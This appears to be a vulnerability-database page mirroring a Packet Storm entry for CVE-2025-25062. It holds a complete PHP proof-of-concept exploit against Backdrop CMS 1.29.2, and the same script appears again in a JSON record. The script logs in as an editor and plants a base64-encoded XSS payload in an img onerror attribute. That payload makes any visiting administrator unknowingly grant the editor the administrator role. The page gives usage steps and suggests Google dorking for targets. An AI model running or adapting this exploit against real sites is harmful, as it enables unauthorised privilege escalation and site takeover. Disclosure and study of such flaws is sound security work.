📄 Backdrop CMS 1.29.2 CSRF / XSS / Privilege Escalation

4.4 / 10

MEDIUM

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N

Description

Proof of concept exploit that demonstrates how Backdrop CMS version 1.29.2 suffers from cross site request forgery, persistent cross site scripting, and privilege escalation vulnerabilities...

Visit Original Source

Basic Information

ID PACKETSTORM:214118

Published Jan 21, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Backdrop CMS 1.29.2 Privilege Escalation
|
| # Author : indoushka
|
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64
bits) |
| # Vendor : https://backdropcms.org/releases/backdrop-1292
|
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Privilege Escalation via Stored XSS and CSRF in
Backdrop CMS .

(Related : https://packetstorm.news/files/id/189006/ Related CVE
numbers: CVE-2025-25062 ) .

[+] save code as poc.php.

[+] Set Target : line 5.

[+] Usage : php poc.php

[+] PayLoad :

<?php

// استخدام المكتبات اللازمة للتعامل مع الطلبات HTTP
$session = curl_init();
$backdrop_url = "http://localhost"; // تعديل الرابط حسب الحاجة
$editor_username = "editor"; // اسم المستخدم
$editor_password = "password"; // كلمة المرور

// دالة لتوليد الحمولة الخبيثة
function construct_payload($post_html_body, $editor_user_id,
$editor_username, $editor_email) {
$url_encoded_editor_email = urlencode($editor_email);

$malicious_js = "
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get',
'/?q=user/{$editor_user_id}/edit&destination=admin/people/list', true);
req.withCredentials = true;
req.send();

function handleResponse() {
var build_id = this.responseText.match(/name=\"form_build_id\"
value=\"(form-[^\"]*)\"/)[1];
var token = this.responseText.match(/name=\"form_token\"
value=\"([^\"]*)\"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/?q=user/{$editor_user_id}/edit', true);
changeReq.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded')
changeReq.withCredentials = true;

changeReq.send('name={$editor_username}&mail={$url_encoded_editor_email}&pass=&form_build_id='
+ build_id + '&form_token=' + token +
'&form_id=user_profile_form&status=1&roles%5Beditor%5D=editor&roles%5Badministrator%5D=administrator&timezone=America%2FNew_York&additional_settings__active_tab=&op=Save');
}
";

$b64_encoded = base64_encode($malicious_js);

$injection = "<img src=x onerror='eval(atob(\"{$b64_encoded}\"))'>";

return $post_html_body . $injection;
}

// دالة لإنشاء المنشور
function create_post($backdrop_url, $editor_username, $post_title,
$html_body) {
global $session;

$response = curl_get_request($backdrop_url . "/?q=node/add/post");
preg_match('/name="form_build_id" value="([^"]*)"/', $response,
$matches);
if (isset($matches[1])) {
$form_build_id = $matches[1];
} else {
die("Form build ID not found.");
}

preg_match('/name="form_token" value="([^"]*)"/', $response, $matches);
if (isset($matches[1])) {
$form_token = $matches[1];
} else {
die("Form token not found.");
}

$now = date("Y-m-d H:i:s");

$data = [
'title' => $post_title,
'field_tags[und]' => '',
'body[und][0][value]' => $html_body,
'body[und][0][format]' => 'filtered_html',
'form_build_id' => $form_build_id,
'form_token' => $form_token,
'form_id' => 'post_node_form',
'status' => '1',
'scheduled[date]' => date('Y-m-d'),
'scheduled[time]' => date('H:i:s'),
'promote' => '1',
'name' => $editor_username,
'date[date]' => date('Y-m-d'),
'date[time]' => date('H:i:s'),
'op' => 'Save'
];

$response = curl_post_request($backdrop_url . "/?q=node/add/post",
$data);

preg_match('/<a href="(\/\?q=node\/\d+\/edit)">Edit<\/a>/', $response,
$matches);
if (isset($matches[1])) {
$edit_url = $backdrop_url . $matches[1];
} else {
die("Edit URL not found.");
}

return $edit_url;
}

// دالة لجلب تفاصيل الحساب
function get_account_details($backdrop_url) {
global $session;

$response = curl_get_request($backdrop_url . "/?q=accounts/editor");
preg_match('/<a href="\/\?q=user\/(\d+)\/edit">Edit<\/a>/', $response,
$matches);
if (isset($matches[1])) {
$editor_user_id = $matches[1];
} else {
die("Editor user ID not found.");
}

$response = curl_get_request($backdrop_url .
"/?q=/user/{$editor_user_id}/edit");
preg_match('/name="mail" value="([^"]*)"/', $response, $matches);
if (isset($matches[1])) {
$editor_email = $matches[1];
} else {
die("Editor email not found.");
}

return [$editor_user_id, $editor_email];
}

// دالة لتسجيل الدخول
function login($backdrop_url, $editor_username, $editor_password) {
global $session;

$response = curl_get_request($backdrop_url . "/?q=user/login");
preg_match('/name="form_build_id" value="([^"]*)"/', $response,
$matches);
if (isset($matches[1])) {
$form_build_id = $matches[1];
} else {
die("Form build ID not found during login.");
}

$data = [
'name' => $editor_username,
'pass' => $editor_password,
'form_build_id' => $form_build_id,
'form_id' => 'user_login',
'op' => 'Log in'
];

$response = curl_post_request($backdrop_url . "/?q=user/login", $data);
}

// دالة لعمل الطلب GET
function curl_get_request($url) {
global $session;
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
return curl_exec($session);
}

// دالة لعمل الطلب POST
function curl_post_request($url, $data) {
global $session;
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, $data);
return curl_exec($session);
}

// الشيفرة الرئيسية
$editor_username = "editor";
$editor_password = "password";
$post_title = "Test Post";
$backdrop_url = "http://localhost";

login($backdrop_url, $editor_username, $editor_password);
list($editor_user_id, $editor_email) = get_account_details($backdrop_url);
$html_body = construct_payload("", $editor_user_id, $editor_username,
$editor_email);
$edit_url = create_post($backdrop_url, $editor_username, $post_title,
$html_body);

echo "Once an Admin visits the following URL, you'll be granted the
'Administrator' role: {$edit_url}\n";

?>

Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-01-21T15:43:47",
    "description": "Proof of concept exploit that demonstrates how Backdrop CMS version 1.29.2 suffers from cross site request forgery, persistent cross site scripting, and privilege escalation vulnerabilities...",
    "published": "2026-01-21T00:00:00",
    "modified": "2026-01-21T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Backdrop CMS 1.29.2 CSRF / XSS / Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214118",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-25062"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Backdrop CMS 1.29.2 Privilege Escalation\n                                                                     |\n    | # Author    : indoushka\n                                                                    |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64\n    bits)                                                            |\n    | # Vendor    : https://backdropcms.org/releases/backdrop-1292\n                                                                     |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: Privilege Escalation via Stored XSS and CSRF in\n    Backdrop CMS .\n    \n        (Related : https://packetstorm.news/files/id/189006/ Related CVE\n    numbers: CVE-2025-25062 ) .\n    \n    [+] save code as poc.php.\n    \n    [+] Set Target : line 5.\n    \n    [+] Usage : php poc.php\n    \n    [+] PayLoad :\n    \n    <?php\n    \n    // \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0645\u0643\u062a\u0628\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0627\u0644\u0637\u0644\u0628\u0627\u062a HTTP\n    $session = curl_init();\n    $backdrop_url = \"http://localhost\";  // \u062a\u0639\u062f\u064a\u0644 \u0627\u0644\u0631\u0627\u0628\u0637 \u062d\u0633\u0628 \u0627\u0644\u062d\u0627\u062c\u0629\n    $editor_username = \"editor\";  // \u0627\u0633\u0645 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\n    $editor_password = \"password\";  // \u0643\u0644\u0645\u0629 \u0627\u0644\u0645\u0631\u0648\u0631\n    \n    // \u062f\u0627\u0644\u0629 \u0644\u062a\u0648\u0644\u064a\u062f \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629\n    function construct_payload($post_html_body, $editor_user_id,\n    $editor_username, $editor_email) {\n        $url_encoded_editor_email = urlencode($editor_email);\n    \n        $malicious_js = \"\n            var req = new XMLHttpRequest();\n            req.onload = handleResponse;\n            req.open('get',\n    '/?q=user/{$editor_user_id}/edit&destination=admin/people/list', true);\n            req.withCredentials = true;\n            req.send();\n    \n            function handleResponse() {\n                var build_id = this.responseText.match(/name=\\\"form_build_id\\\"\n    value=\\\"(form-[^\\\"]*)\\\"/)[1];\n                var token = this.responseText.match(/name=\\\"form_token\\\"\n    value=\\\"([^\\\"]*)\\\"/)[1];\n                var changeReq = new XMLHttpRequest();\n                changeReq.open('post', '/?q=user/{$editor_user_id}/edit', true);\n                changeReq.setRequestHeader('Content-Type',\n    'application/x-www-form-urlencoded')\n                changeReq.withCredentials = true;\n    \n    changeReq.send('name={$editor_username}&mail={$url_encoded_editor_email}&pass=&form_build_id='\n    + build_id + '&form_token=' + token +\n    '&form_id=user_profile_form&status=1&roles%5Beditor%5D=editor&roles%5Badministrator%5D=administrator&timezone=America%2FNew_York&additional_settings__active_tab=&op=Save');\n            }\n        \";\n    \n        $b64_encoded = base64_encode($malicious_js);\n    \n        $injection = \"<img src=x onerror='eval(atob(\\\"{$b64_encoded}\\\"))'>\";\n    \n        return $post_html_body . $injection;\n    }\n    \n    // \u062f\u0627\u0644\u0629 \u0644\u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u0645\u0646\u0634\u0648\u0631\n    function create_post($backdrop_url, $editor_username, $post_title,\n    $html_body) {\n        global $session;\n    \n        $response = curl_get_request($backdrop_url . \"/?q=node/add/post\");\n        preg_match('/name=\"form_build_id\" value=\"([^\"]*)\"/', $response,\n    $matches);\n        if (isset($matches[1])) {\n            $form_build_id = $matches[1];\n        } else {\n            die(\"Form build ID not found.\");\n        }\n    \n        preg_match('/name=\"form_token\" value=\"([^\"]*)\"/', $response, $matches);\n        if (isset($matches[1])) {\n            $form_token = $matches[1];\n        } else {\n            die(\"Form token not found.\");\n        }\n    \n        $now = date(\"Y-m-d H:i:s\");\n    \n        $data = [\n            'title' => $post_title,\n            'field_tags[und]' => '',\n            'body[und][0][value]' => $html_body,\n            'body[und][0][format]' => 'filtered_html',\n            'form_build_id' => $form_build_id,\n            'form_token' => $form_token,\n            'form_id' => 'post_node_form',\n            'status' => '1',\n            'scheduled[date]' => date('Y-m-d'),\n            'scheduled[time]' => date('H:i:s'),\n            'promote' => '1',\n            'name' => $editor_username,\n            'date[date]' => date('Y-m-d'),\n            'date[time]' => date('H:i:s'),\n            'op' => 'Save'\n        ];\n    \n        $response = curl_post_request($backdrop_url . \"/?q=node/add/post\",\n    $data);\n    \n        preg_match('/<a href=\"(\\/\\?q=node\\/\\d+\\/edit)\">Edit<\\/a>/', $response,\n    $matches);\n        if (isset($matches[1])) {\n            $edit_url = $backdrop_url . $matches[1];\n        } else {\n            die(\"Edit URL not found.\");\n        }\n    \n        return $edit_url;\n    }\n    \n    // \u062f\u0627\u0644\u0629 \u0644\u062c\u0644\u0628 \u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u062d\u0633\u0627\u0628\n    function get_account_details($backdrop_url) {\n        global $session;\n    \n        $response = curl_get_request($backdrop_url . \"/?q=accounts/editor\");\n        preg_match('/<a href=\"\\/\\?q=user\\/(\\d+)\\/edit\">Edit<\\/a>/', $response,\n    $matches);\n        if (isset($matches[1])) {\n            $editor_user_id = $matches[1];\n        } else {\n            die(\"Editor user ID not found.\");\n        }\n    \n        $response = curl_get_request($backdrop_url .\n    \"/?q=/user/{$editor_user_id}/edit\");\n        preg_match('/name=\"mail\" value=\"([^\"]*)\"/', $response, $matches);\n        if (isset($matches[1])) {\n            $editor_email = $matches[1];\n        } else {\n            die(\"Editor email not found.\");\n        }\n    \n        return [$editor_user_id, $editor_email];\n    }\n    \n    // \u062f\u0627\u0644\u0629 \u0644\u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\n    function login($backdrop_url, $editor_username, $editor_password) {\n        global $session;\n    \n        $response = curl_get_request($backdrop_url . \"/?q=user/login\");\n        preg_match('/name=\"form_build_id\" value=\"([^\"]*)\"/', $response,\n    $matches);\n        if (isset($matches[1])) {\n            $form_build_id = $matches[1];\n        } else {\n            die(\"Form build ID not found during login.\");\n        }\n    \n        $data = [\n            'name' => $editor_username,\n            'pass' => $editor_password,\n            'form_build_id' => $form_build_id,\n            'form_id' => 'user_login',\n            'op' => 'Log in'\n        ];\n    \n        $response = curl_post_request($backdrop_url . \"/?q=user/login\", $data);\n    }\n    \n    // \u062f\u0627\u0644\u0629 \u0644\u0639\u0645\u0644 \u0627\u0644\u0637\u0644\u0628 GET\n    function curl_get_request($url) {\n        global $session;\n        curl_setopt($session, CURLOPT_URL, $url);\n        curl_setopt($session, CURLOPT_RETURNTRANSFER, true);\n        return curl_exec($session);\n    }\n    \n    // \u062f\u0627\u0644\u0629 \u0644\u0639\u0645\u0644 \u0627\u0644\u0637\u0644\u0628 POST\n    function curl_post_request($url, $data) {\n        global $session;\n        curl_setopt($session, CURLOPT_URL, $url);\n        curl_setopt($session, CURLOPT_RETURNTRANSFER, true);\n        curl_setopt($session, CURLOPT_POST, true);\n        curl_setopt($session, CURLOPT_POSTFIELDS, $data);\n        return curl_exec($session);\n    }\n    \n    // \u0627\u0644\u0634\u064a\u0641\u0631\u0629 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629\n    $editor_username = \"editor\";\n    $editor_password = \"password\";\n    $post_title = \"Test Post\";\n    $backdrop_url = \"http://localhost\";\n    \n    login($backdrop_url, $editor_username, $editor_password);\n    list($editor_user_id, $editor_email) = get_account_details($backdrop_url);\n    $html_body = construct_payload(\"\", $editor_user_id, $editor_username,\n    $editor_email);\n    $edit_url = create_post($backdrop_url, $editor_username, $post_title,\n    $html_body);\n    \n    echo \"Once an Admin visits the following URL, you'll be granted the\n    'Administrator' role: {$edit_url}\\n\";\n    \n    ?>\n    \n    \n    \n    \n    Greetings to\n    :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln\n    (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/214118",
    "cvss": {
        "score": 4.4,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214118/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Backdrop CMS 1.29.2 CSRF / XSS / Privilege Escalation_PACKETSTORM:214118

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply